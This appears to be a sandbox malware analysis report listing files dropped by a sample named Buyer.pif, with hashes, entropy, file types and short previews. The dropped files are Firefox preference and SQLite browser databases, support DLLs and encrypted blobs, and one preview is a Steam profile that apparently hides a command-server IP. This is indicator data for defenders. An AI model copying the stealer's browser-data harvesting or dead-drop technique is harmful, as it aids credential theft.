                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9504
                                                                                                  Entropy (8bit):5.512408163813622
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                  Malicious:false
                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40960
                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.8439810553697228
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):98304
                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):159744
                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):106496
                                                                                                  Entropy (8bit):1.136413900497188
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155648
                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):685392
                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 1lKbb2hF7fYToopfpmEvlyRN.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: 6SoKuOqyNh.exe, Detection: malicious
                                                                                                  • Filename: IRqsWvBBMc.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: JGKjBsQrMc.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):608080
                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 1lKbb2hF7fYToopfpmEvlyRN.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: 6SoKuOqyNh.exe, Detection: malicious
                                                                                                  • Filename: IRqsWvBBMc.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: JGKjBsQrMc.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):450024
                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2046288
                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):257872
                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):80880
                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34725
                                                                                                  Entropy (8bit):5.3989762308442
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:/dpqm+0Ih3tAA9CWGVGfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x24:/d8m+0Ih3tAA9CWGVGFJTBv++nIjBtP8
                                                                                                  MD5:2783C762D013D91D1DFA6D835336E028
                                                                                                  SHA1:7F6A759C65D4973440901F4C3DDF85926721A584
                                                                                                  SHA-256:91703EFEA7DDC0AA59216E3D262A5BA269B30FA4EEE453ED8E04536B967E6F96
                                                                                                  SHA-512:31FFDBD13A1003288EB9704CBBC3DBC0321A09F088A7A5A6E408E5C2DB9702196CE0FFC6CE077ABF7794EF4B1D886FBEFF1F884C2D657506350543B7D7822C85
                                                                                                  Malicious:false
                                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://5.75.212.60|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):946784
                                                                                                  Entropy (8bit):6.628560786473655
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                                                                                  MD5:848164D084384C49937F99D5B894253E
                                                                                                  SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                                                                                  SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                                                                                  SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):320201
                                                                                                  Entropy (8bit):7.999436524855693
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:6144:m7uI5Yp4g5RzcmIlLwUBDj5JilIVLg1Q/UTBKQbxXT2FivQ9uzjxj:mKI6p/34PhwUBD9wyLgPTLxj+iIuz9j
                                                                                                  MD5:062C5639A34320E7E35839B40F0ED702
                                                                                                  SHA1:BEC55EBD9F1D0E8505C5FFCF6214252BFF80BE72
                                                                                                  SHA-256:F72ACCBA089F7D6643EB4C50BFB8AC7C8FE96CD842F0235988C3CED5108A72A6
                                                                                                  SHA-512:25AC75E939CBFD2106991138FC6A8410D97146F42E3D06DC0539548642385D4031CF521BDB6877F8DD4CFA56E72AEBC5A80962AD1F2DA15F8D4A8B4BC26425A8
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22528
                                                                                                  Entropy (8bit):6.601653603159352
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8AirRanWcch01t+s6xVw9ZrJrWOLOq4oP335flCKSMlk8WLvChJd/AV5x8y:8ArnWccuUrw9ZrJNLJj33FSGWehzML
                                                                                                  MD5:9C5FAD56FE591AFBCF17FC7210281ECB
                                                                                                  SHA1:D4B89F30059C8BEDD405332B4D13FE5B947D112A
                                                                                                  SHA-256:1ACBD25A8056B2C578AC04E276AD9641403D10D8DBC2257DB22F8BFBEA33EBCD
                                                                                                  SHA-512:8FCA409016E5796CB71C27A8E4AA43CA2641C509B71CC6114758B3D926B4BBD9C0D3951A83EA75359E07F6A7A696EF324B88741F8EE40A378C12FD3BA5D73E08
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60416
                                                                                                  Entropy (8bit):6.699139234131258
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:zetdlf8rfKE5Km7wrH9rbjF4vvy1CThsoE:zetHufKE5Kmqd1UhlE
                                                                                                  MD5:A5F9FA23B67D3F24A2248A7ADF0A7B50
                                                                                                  SHA1:FCDE6A9A7EC66B58F35FCF6C4FFB74B55877BD6A
                                                                                                  SHA-256:2C3867A30D2D05C0D877059B96F519772CBBBD2A0D7FD7C7F2268F76F41E2107
                                                                                                  SHA-512:7BD202CAF622665F263E93B4E1B0BA6734E8FF82506EA487FE1840D9DCEAB8BBC70E0B1EED5AB5BF786C97563C9CBC06FAE2AB70A4D8A172BB5634EE1A1D6297
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 21280--27861, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.589205
                                                                                                  Category:dropped
                                                                                                  Size (bytes):50176
                                                                                                  Entropy (8bit):6.202001029100119
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6wsWcfcd0vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vm4uys:6wsWcfcd0vtmgMbFuz08QuklMBNIi9uf
                                                                                                  MD5:E4923AC5C4F0816638E15D99074178BA
                                                                                                  SHA1:DE1CAE1919D7A8A7C8E75EB801D1E6913836C98D
                                                                                                  SHA-256:69C2B3D548A856FC720B433E8745D06F8E1638DAA869889B415797D2E72C4E93
                                                                                                  SHA-512:3548A8D4494E9B68E18394C74F0FF86CDE9904FC064201D8FC9CF06263C8CF0FD91399EEF0684E23C18CFC208F4CAA21F0A3865941DBCD11B36BE2E41DD4E504
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):51200
                                                                                                  Entropy (8bit):6.615822679045742
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Mhgt2F9m+qMHUPe3vKsyJXT6TLx3nS4/33SrFv:Mq3U0Pe3vHU4S4/33SrFv
                                                                                                  MD5:3F190D8EFBC3C814B81B56987037B7DC
                                                                                                  SHA1:6B1837CA72CC8136715149A6986CDE78578D14F3
                                                                                                  SHA-256:59FAE68A446F276BEEA0EE0FC866828B20DD52790FFA5F86FB964A962DD66A4F
                                                                                                  SHA-512:F3932F638E9EF0CD2F8A638BB3166AAE64540A7FF0C2AFE7183740B1C798642CE0795455F489A4B66543CBDE0A3C6EBD418AF16AF965CC882BC3EBC17ED30E85
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22528
                                                                                                  Entropy (8bit):6.699129528400463
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:vTugTVxJZA6b6/Q/ceOIl2XDoXwT7HBXyerAPV+xleN:PT/JW6e/Q/cXIl2EX4tXyeXxleN
                                                                                                  MD5:73A5769B0D0BDA93DB733B26589113A0
                                                                                                  SHA1:BB8CABA82A5339802615B29D81DED3DCBA6151CE
                                                                                                  SHA-256:E4DB4DB3B69E13FB052A3FDE7F14CDC59BB1619E47BB10C397AE82053A7000E2
                                                                                                  SHA-512:356A5841569EBA5E90CB897A4BFD32FEECFF2E7461160A8C3AD63BDDE080399B0F8AB8262418DBC28230E67623F63E0E736FF452E67E581FA4408CB7971E8E28
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34816
                                                                                                  Entropy (8bit):6.626969924367001
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:XViUpLSifdrdqGhSlsB4IHo5DmJ2YAuT9XCYsywaVtTSVn7XTj:XVVSoNd6sqII0RAuTtCHaVej
                                                                                                  MD5:99F0B7D1980E51CB51C040F94CA6BDA4
                                                                                                  SHA1:FB250E5D30584DB09BDB3CD3647ABB49F33B9A9A
                                                                                                  SHA-256:2EFB0040EB9A496CC6A93003C844046EFD0F93061BA02C49037E7017F2301AB0
                                                                                                  SHA-512:5380FFAA93FD9ADDB608423A27A009AF90E5BC57EE857686F5FF16DF337E3DDBFA34B64E6AFDFCC74A0C16D703BF0621AA905B804427C6ADAE99229447BB7007
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7168
                                                                                                  Entropy (8bit):6.341036152981317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:uRgoWPJpBhTYpJ3pJGi3NcHBvazoo9XlNQCM+kSntZ:GlWzBhTYpJWSmkzf9XlNQCM+kStZ
                                                                                                  MD5:12333550EFD9DD43718F5689EA61F5F1
                                                                                                  SHA1:AA30DC952B02FFC2649C430063103489F4E81450
                                                                                                  SHA-256:E8C81F887906F7E9AC6D28B086770DB1FC355635D79B3429ECB2607E50E65647
                                                                                                  SHA-512:27C089894B9DAF0837252F6B3277458EC5FF80C2B94FC885498512A933C7CEFCCA9CC28ABCBEA5DF2F93E0D3AC141F7E93E79B5FE93B6E0AF1716027141AB600
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19456
                                                                                                  Entropy (8bit):6.442249645703308
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:kqhbk+k7B/oPN72jljSKgaEVXqcBe3ASH7djM2COa:dhbVk76PJslrmTAp7djEv
                                                                                                  MD5:B6B7838D27D7D6370C4C56038270002C
                                                                                                  SHA1:3D25AF0E449EA795FE9ACB061487B74C4B4B82C2
                                                                                                  SHA-256:84FDA09356BD13134E107D49E0C4525AB7DF713B71FFD75602E8A699E2D0095C
                                                                                                  SHA-512:74839E4F3DCBF2BEC604533FC11B84A9A7AF6F37E6C7F955EE535F74CE19E85BC38BF7AD2142F3269F8E1EE95E758A18069B91654F9E5BDD8B54036E0E2AB1EF
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):67584
                                                                                                  Entropy (8bit):7.997408342262568
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:SAhv62aXBmuIUaSFy6D5Ys04ZysGvrxjGmt6Du3LVil4:SN7uzOf5Yp4ZysCrdGmt6mIl4
                                                                                                  MD5:74809A51191E9BD7D017593155539330
                                                                                                  SHA1:A153914897EF035E59E60CBE28E6FAA04D37C345
                                                                                                  SHA-256:C0F4DC26A5EE8028DCD52FD647989611628677B82642FA368E146E21776F6566
                                                                                                  SHA-512:87924B083DE647476A5D493AF0CF03967CFEFB691A76D20585D3A04C0943D595D33ED388748E448D19B32F5FA0B3BE461E5B9BB9BA8CC153A46C6005EF9E5150
                                                                                                  Malicious:false
